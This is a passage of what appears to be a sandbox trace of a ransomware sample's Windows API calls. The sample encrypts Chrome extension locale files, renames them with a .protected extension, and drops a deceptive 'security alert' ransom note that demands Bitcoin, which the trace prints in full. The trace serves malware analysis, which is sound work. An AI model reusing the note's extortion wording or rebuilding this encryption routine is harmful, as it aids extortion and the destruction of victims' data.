lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.507] CloseHandle (hObject=0x168) returned 1 [0080.507] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.protected") returned 165 [0080.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.protected")) returned 1 [0080.507] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.507] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.507] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\RESTORE_FILES.txt") returned 159 [0080.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.508] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.508] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.509] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.509] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.509] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.509] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.509] CloseHandle (hObject=0x164) returned 1 [0080.509] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0080.509] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi") returned 141 [0080.509] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0080.509] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0080.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\*") returned 143 [0080.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.509] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.509] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.509] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.509] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\.") returned 143 [0080.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.509] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.509] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.509] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.509] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.509] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.509] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\..") returned 144 [0080.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.510] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.510] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0080.510] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.510] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.510] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.510] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0080.511] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0080.511] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0080.511] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.511] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x13e, lpOverlapped=0x0) returned 1 [0080.511] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffec2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.511] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x13e, lpOverlapped=0x0) returned 1 [0080.512] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.512] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.512] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.512] CloseHandle (hObject=0x168) returned 1 [0080.512] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.protected") returned 165 [0080.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.protected")) returned 1 [0080.512] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.512] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.513] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0080.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.513] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.513] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.514] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.514] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.514] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.514] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.514] CloseHandle (hObject=0x164) returned 1 [0080.514] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0080.514] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr") returned 141 [0080.514] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0080.514] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0080.514] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\*") returned 143 [0080.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.514] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.514] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.514] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.514] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.514] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.514] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\.") returned 143 [0080.514] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.514] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.514] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.514] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.515] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.515] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.515] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.515] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\..") returned 144 [0080.515] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.515] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.515] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.515] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0080.515] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.515] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.515] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.515] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0080.515] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0080.515] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0080.515] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.515] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc8, lpOverlapped=0x0) returned 1 [0080.516] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.516] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc8, lpOverlapped=0x0) returned 1 [0080.516] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.516] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.516] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.516] CloseHandle (hObject=0x168) returned 1 [0080.516] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 